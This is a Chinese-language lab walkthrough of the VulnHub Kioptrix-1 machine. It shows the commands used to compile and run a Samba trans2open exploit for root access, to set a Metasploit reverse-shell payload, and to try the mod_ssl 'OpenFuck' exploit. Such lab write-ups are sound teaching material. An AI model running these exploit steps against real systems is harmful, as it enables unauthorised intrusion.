vulnhub靶场【kioptrix-1】靶机

admin 2025年1月30日02:46:39评论8 views字数 2125阅读7分5秒阅读模式

前言

靶机:kioptrix-1,IP地址为192.168.1.104

攻击:kali,IP地址为192.168.1.16

都采用虚拟机,网卡为桥接模式

文章中涉及的靶机,来源于vulnhub官网,想要下载,可自行访问官网下载,或者在本公众号回复 kioptrix 即可获取

主机发现

使用arp-scan -lnetdiscover -r 192.168.10.1/24扫描

也可以使用nmap等工具进行

vulnhub靶场【kioptrix-1】靶机

信息收集

使用nmap扫描端口

vulnhub靶场【kioptrix-1】靶机

对于后续的目录爆破等,因为我个人测试过,所以发现网站的目录无价值,进而直接搜索版本漏洞进行测试

smb漏洞寻找并利用

使用searchsploit

前面直接发现139端口开启,并且nmap扫描出的是sam服务

那么使用smbclient尝试连接,看能否有东西产出

如图,并未把版本揭示,那么我对于漏洞的使用缺失重要的一块

vulnhub靶场【kioptrix-1】靶机

更换工具,采用github上的一个项目进行测试https://github.com/amitn322/smb-version/blob/master/samba_version.py

下载到kali中,然后执行脚本即可

python2 smbversion.py -s 192.168.1.104
vulnhub靶场【kioptrix-1】靶机

使用searchsploit进行测试,发现对应的漏洞只有一个可用于继续下一步,对于.rb,因为是msf特有的,所以暂不考虑

vulnhub靶场【kioptrix-1】靶机

查看10.c文件,给出了用法

vulnhub靶场【kioptrix-1】靶机

那么直接进行编译即可

gcc 10.c -o exp
vulnhub靶场【kioptrix-1】靶机

编译成功,直接执行上面的用法,针对单个ip即可

./exp -b 0 -v 192.168.1.104

执行后,提权至root

vulnhub靶场【kioptrix-1】靶机

使用msf

把上面作为节点,这里是新的

这里还是要检测smb服务的版本,这里借助整个msf作为使用

使用下面命令启动msf,并搜索对应的模块

msfconsole
search type:auxiliary smb version detection
vulnhub靶场【kioptrix-1】靶机

那么使用该模块,命令如下

msf6 > use 0
msf6 auxiliary(scanner/smb/smb_version) > options

msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.104
msf6 auxiliary(scanner/smb/smb_version) > set rport 139
msf6 auxiliary(scanner/smb/smb_version) > options

msf6 auxiliary(scanner/smb/smb_version) > run
vulnhub靶场【kioptrix-1】靶机

执行后,会看到对应的版本信息

vulnhub靶场【kioptrix-1】靶机

通过版本在msf中搜索可执行漏洞,这里注意,漏洞都是同一种trans2open,只是操作系统不同,这里靶机为linux操作系统,所以根据操作系统去选择

search type:exploit samba 2.2
vulnhub靶场【kioptrix-1】靶机
use 2
options

set rhost 192.168.1.104
//端口默认目标的是139

这里需要设置一个payload进行监听反弹shell,所以需要设置linux的监听

set payload linux/x86/shell/reverse_tcp
//脚本很多,选择其中一个即可
vulnhub靶场【kioptrix-1】靶机

这时候执行,等待缓冲区溢出的爆破,一会即可发现反弹成功

vulnhub靶场【kioptrix-1】靶机

web应用漏洞寻找利用

在之前使用nmap扫描时,确定443端口服务的版本mod_ssl 2.8.4,尝试进行搜索了一下,发现有版本范围内的一个漏洞openfuck

searchsploit mod_ssl 2.8.4
vulnhub靶场【kioptrix-1】靶机

再使用nikto测试,发现也是有提到,可能存在

nikto -h 192.168.1.104
vulnhub靶场【kioptrix-1】靶机

测试,直接使用remote buffer overflow,这个是我个人习惯,采用最新版本。

查看这个c文件,其中有用法,以及条件

vulnhub靶场【kioptrix-1】靶机

那么就执行安装后,然后再编译

apt-get install libssl-dev
gcc -o openfuck 47080.c -lcrypto

执行编译后的openfuck,查看帮助,提供用法

./openfuck
vulnhub靶场【kioptrix-1】靶机

大概用法就是

./openfuck 192.168.1.104 [box] 443

向下翻找,发现与前面nmap扫描出的443端口的服务版本redhat,中间件版本apache 1.3.20对应的有两个

vulnhub靶场【kioptrix-1】靶机

测试这两个即可

./openfuck 192.168.1.104 0x6a 443

./openfuck 192.168.1.104 0x6b 443

这里经过测试两个,发现都是提示超时

vulnhub靶场【kioptrix-1】靶机

可能这里无法利用,不过查看了网上的wp,发现可以利用,这让我陷入深思,所以暂且到这里,等我搞清楚,会发布

总结

该靶机考察以下几点:

  1. 对于存在的smb服务,要能够识别出版本信息,也就是信息收集,这样才能为下一步确定有无版本信息做铺垫
  2. 善于使用searchsploit,这个是调用一个漏洞库中的信息,当然对于漏洞库也不要仅限于一个,多个漏洞库去搜索,可能这个没有,那个会有
  3. 对于给出的pocc文件等,要会编译,并复现,经常查看源文件
  4. 对于msf这个强大的工具,要会使用,至少要知道一些简单的用法

主要考察的就是对于服务的版本历史漏洞的复现,以及利用

原文始发于微信公众号(泷羽sec-何生安全):vulnhub靶场【kioptrix-1】靶机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月30日02:46:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub靶场【kioptrix-1】靶机https://cn-sec.com/archives/3664247.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息